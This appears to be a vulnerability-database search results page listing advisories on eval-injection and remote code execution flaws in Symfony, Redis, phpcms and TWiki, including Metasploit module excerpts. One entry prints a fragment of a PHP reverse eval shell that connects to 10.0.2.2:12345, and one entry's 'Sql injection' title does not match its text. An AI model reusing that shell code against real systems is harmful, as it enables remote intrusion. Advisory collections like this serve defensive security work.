2432 matches found

NVD
added 2015/06/24 10:59 a.m. | 13 views

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVSS 6.8 | AI score 7.6 | EPSS 0.00543
Exploits: 0 | References: 4

OSV
added 2015/06/24 10:59 a.m. | 5 views

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVSS 6.8 | AI score 7.5 | EPSS 0.00543
Exploits: 0 | References: 5

OSV
added 2015/06/24 10:59 a.m. | 0 views

UBUNTU-CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVSS 6.8 | AI score 6.1 | EPSS 0.00543
Exploits: 0 | References: 2

Prion
added 2015/06/24 10:59 a.m. | 18 views

Sql injection

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

CVSS 6.8 | AI score 8.1 | EPSS 0.00543
Exploits: 0 | References: 4 | Affected Software: 1

Cvelist
added 2015/06/24 10:0 a.m. | 22 views

CVE-2015-2308

Eval injection vulnerability in the HttpCache class in HttpKernel in Symfony 2.x before 2.3.27, 2.4.x and 2.5.x before 2.5.11, and 2.6.x before 2.6.6 allows remote attackers to execute arbitrary PHP code via a language="php" attribute of a SCRIPT element...

AI score 7.4 | EPSS 0.00543
Exploits: 0 | References: 4

CVE
added 2015/06/24 10:0 a.m. | 77 views

CVE-2015-2308

Symfony 2.x vulnerable to PHP code execution via HTTP cache HttpCache Eval injection. Affected: HttpKernel HttpCache class when ESI is enabled. Root cause: language="php" attribute in SCRIPT elements not escaped before eval(). Affected versions: Symfony 2.0.x–2.6.x with fixes in 2.3.27, 2.5.11, a...

CVSS 6.8 | AI score 7.6 | EPSS 0.00543
Exploits: 0 | References: 4 | Affected Software: 1

CNVD
added 2015/06/10 12:0 a.m. | 2 views

Redis EVAL Lua Sandbox Security Bypass Vulnerability

Redis is an open source, memory-based key-value store (the simplest form of database organization). Redis has a security vulnerability that allows a remote attacker to bypass certain security restrictions by submitting a special eval command to execute arbitrary Lua byteco...

CVSS 10 | AI score 7.7 | EPSS 0.08757
Exploits: 2 | References: 1

OSV
added 2015/06/09 2:59 p.m. | 1 views

DEBIAN-CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

CVSS 10 | AI score 7.6 | EPSS 0.08757
Exploits: 2 | References: 1

OSV
added 2015/06/09 2:59 p.m. | 2 views

AZL-44232 CVE-2015-4335 affecting package compat-lua 5.1.5-17

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

CVSS 10 | AI score 6.7 | EPSS 0.08757
Exploits: 2 | References: 1

UbuntuCve
added 2015/06/09 2:59 p.m. | 32 views

CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

CVSS 10 | AI score 6.6 | EPSS 0.08757
Exploits: 2 | References: 3

OSV
added 2015/06/09 2:59 p.m. | 1 views

UBUNTU-CVE-2015-4335

Redis before 2.8.21 and 3.x before 3.0.2 allows remote attackers to execute arbitrary Lua bytecode via the eval command...

CVSS 10 | AI score 6.7 | EPSS 0.08757
Exploits: 2 | References: 4

CVE
added 2015/06/09 2:0 p.m. | 123 views

CVE-2015-4335

CVE-2015-4335: Redis EVAL Lua sandbox escape. The vulnerability affects Redis up to 2.8.21 and 3.x up to 3.0.2, where remote attackers could abuse the EVAL Lua command to execute arbitrary Lua bytecode, potentially escaping the sandbox and running code with Redis process privileges. Debian’s adv...

CVSS 10 | AI score 7 | EPSS 0.08757
In wild | Exploits: 2 | References: 13 | Affected Software: 1

Tenable Nessus
added 2015/06/09 12:0 a.m. | 33 views

FreeBSD : redis -- EVAL Lua Sandbox Escape (838fa84a-0e25-11e5-90e4-d050996490d0)

Ben Murphy reports: It is possible to break out of the Lua sandbox in Redis and execute arbitrary code. This shouldn't pose a threat to users under the trusted Redis security model where only trusted users can connect to the database. However, in real deployments there could be databases that ca...

CVSS 10 | AI score 5.7 | EPSS 0.08757
Exploits: 2 | References: 3

OSV
added 2015/06/06 12:0 a.m. | 27 views

DSA-3279-1 redis - security update

Bulletin has no description...

CVSS 10 | AI score 6.2 | EPSS 0.08757
Exploits: 2

myhack58
added 2015/04/23 12:0 a.m. | 14 views

phpcms front Desk arbitrary code execution (php must be less than 5.3) - the vulnerabilities and early warning - the black bar safety net

The phpcms v9 string2array function uses the eval function, which in more than one place may cause a code execution vulnerability. /phpssoserver/phpcms/libs/functions/global.func.php: / Converts a string to an array @param string $data the string @return array returns the array...

AI score 2.7
Exploits: 0

rdot
added 2015/04/08 12:0 a.m. | 816 views

PHP reverse eval shell

Made for tunnelling through an RCE when exec and similar functions are restricted. Uses only fsockopen and eval. Forks if pcntlfork is available. PHP code: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

AI score 1.7
Exploits: 0

0day.today
added 2015/03/19 12:0 a.m. | 49 views

TWiki Debugenableplugins Remote Code Execution Exploit

TWiki versions 4.0.x through 6.0.0 contain a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in a Perl eval statement, which allows remote code execution. This module requires Metasploit: http://metasploit.com/download...

AI score 0.2 | EPSS 0.84226
Exploits: 12

myhack58
added 2015/03/19 12:0 a.m. | 19 views

MongoDB management tool exposure remote code execution vulnerability - vulnerability warning - the black bar safety net

MongoDB, a mainstream non-relational (NoSQL) database platform in the IT sector, is one of the popular alternatives to table-based relational databases. Recently, phpMoAdmin, a GUI management tool for MongoDB, was revealed to have a very serious security vulnerability; once exploited, this...

AI score 0.1
Exploits: 0

Exploit DB
added 2015/03/19 12:0 a.m. | 49 views

TWiki Debugenableplugins - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'TWiki Debugenableplugins Remote Code Execution', 'Description' = %q TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug...

CVSS 9.1 | AI score 9.5 | EPSS 0.84226
Exploits: 12

Metasploit
added 2015/03/18 8:45 a.m. | 36 views

TWiki Debugenableplugins Remote Code Execution

TWiki 4.0.x-6.0.0 contains a vulnerability in the Debug functionality. The value of the debugenableplugins parameter is used without proper sanitization in a Perl eval statement, which allows remote code execution. This module requires Metasploit: https://metasploit.com/download Current source:...

CVSS 9.1 | AI score 9.2 | EPSS 0.84226
Exploits: 12